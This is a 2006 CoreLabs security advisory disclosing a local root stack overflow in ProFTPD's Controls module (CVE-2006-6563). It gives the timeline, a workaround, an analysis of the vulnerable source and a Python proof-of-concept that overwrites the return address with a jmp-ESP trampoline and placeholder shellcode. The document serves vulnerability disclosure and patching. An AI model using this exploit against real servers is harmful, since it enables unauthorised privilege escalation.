ProFTPD Controls Buffer Overflow

Advisory ID Internal
CORE-2006-1127

Advisory Information:

Advisory ID: CORE-2006-1127
Bugtraq ID: 21587
CVE Name: CVE-2006-6563
Title: ProFTPD Controls Buffer Overflow
Class: Boundary Error Condition (Buffer Overflow)
Remotely Exploitable: No
Locally Exploitable: Yes
Advisory URL: http://www.coresecurity.com/?action=item&id=1594

Vendors Contacted:

ProFTPD

  • CORE notification: 2006-11-30
  • Notification acknowledged by ProFTPD maintainers: 2006-11-30
  • Technical details sent to ProFTPD maintainers: 2006-11-30
  • ProFTPD team produces a patch for this issue: 2006-12-08
  • Fixed ProFTPD version publicly available: 2006-12-12
  • CORE advisory release: 2006-12-13

Release Mode: COORDINATED RELEASE

Vulnerability Description:

A locally exploitable stack overflow vulnerability has been found in the mod_ctrls module of ProFTPD server.

ProFTPD is a commonly used and highly configurable FTP server for Unix and Windows systems. This server is available as an optional package in most recent Linux distributions, including Debian (sid), Mandriva 2007 and Ubuntu Edgy. For more information concerning ProFTPD, refer to the site http://www.proftpd.org/

The vulnerability is located in the "Controls" module. This is an optional feature of ProFTPD server, that must be activated in the configuration file. Controls are a way to communicate directly with a standalone ProFTPD daemon while it is running. This provides administrators a way to alter the daemon's behavior in real time, without having to restart the daemon and have it re-read its configuration. The Controls feature allow authorized users to locally manage parameters of the ProFTPD servers, like aborting connections, managing users, changing log levels, disabling individual virtual servers, etc.

The vulnerability allows local attackers with access to the Controls features (and who have been allowed by Controls ACLs in proftpd.conf) to gain root privileges.

Vulnerable Packages:

ProFTPD 1.3.0a

ProFTPD 1.3.0

(Older packages are also possibly vulnerable)

Solution/Vendor Information/Workaround:

As a workaournd, turn off the module mod_ctrls, with the following lines added to proftpd.conf:

<IfModule mod_ctrls.c>
ControlsEngine off
</IfModule>

Alternatively, administrators can use the ControlsACLs directive in proftpd.conf to restrict access only to trusted local users.

Version 1.3.1rc1 of ProFTPD, which fixes this issue, is available on the ProFTPD site (http://www.proftpd.org/).

Credits:

This vulnerability was found by Alfredo Ortega from Core Security Technologies.

We wish to thank TJ Saunders from the ProFTPD team for his quick response to this issue.

*Technical Description - Exploit/Concept Code:*

The vulnerability exists in pr_ctrls_recv_request() function from src/ctrls.c

Analysis of the vulnerability follows:

----------------------------------------------------

(Code from ProFTPD 1.3.0a, src/ctrls.c )
int pr_ctrls_recv_request(pr_ctrls_cl_t *cl) {
pr_ctrls_t *ctrl = NULL, *next_ctrl = NULL;
char reqaction[512] = {'\0'}, *reqarg = NULL;
size_t reqargsz = 0;
unsigned int nreqargs = 0, reqarglen = 0;
.
.
.
/* Next, read in the requested number of arguments. The client sends
* the arguments in pairs: first the length of the argument, then the
* argument itself. The first argument is the action, so get the first
* matching pr_ctrls_t (if present), and add the remaining arguments to it.
*/

(1)

if (read(cl->cl_fd, &reqarglen, sizeof(unsigned int)) < 0) { pr_signals_unblock(); return -1; }

(2)

if (read(cl->cl_fd, reqaction, reqarglen) < 0) { pr_signals_unblock(); return -1; } . . . } 

----------------------------------------------------

In (1) the integer 'reqarglen' is fully controlled by the attacker, as it's read directly from the control socket. This allows an attacker to control how much we read into the 'reqaction' variable in (2) (this variable is in the stack).

Example of vulnerable configuration in proftpd.conf:

<IfModule mod_ctrls.c> ControlsEngine on ControlsACLs all allow group someuser ControlsMaxClients 2 ControlsLog /var/log/proftpd/controls.log ControlsInterval 5 ControlsSocket /tmp/ctrls.sock ControlsSocketOwner someuser someuser ControlsSocketACL allow group someuser </IfModule> 

ProFTPD must be compiled with mod_ctrls support ( --enable-ctrls ).

The following is a simple working proof-of-concept (Python).

----------------------------------------------------

# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow

import socket
import os, os.path,stat

#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # inocuous "int 3"

#Build Payload. The format on the stack is:
#
#AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode

#Setup socket
#
if os.path.exists(mySocket):
os.remove(mySocket)
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)
s.bind(mySocket)
os.chmod(mySocket,stat.S_IRWXU)
s.connect(ctrlSocket)

#Send payload
#
s.send("\1\0\0\0")
s.send("\1\0\0\0")
l = len(payload)
s.send(chr(l & 255)+chr((l/255) & 255)+"\0\0")
s.send(payload)

#Finished
#
s.close()

----------------------------------------------------

About CoreLabs:

CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs.  

About Core Security, A HelpSystems Company:

Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com.

Disclaimer:

The contents of this advisory are copyright (c) 2006 CORE Security Technologies and (c) 2006 Corelabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

$Id: proftpd-advisory.txt,v 1.7 2006/12/13 16:47:41 carlos Exp $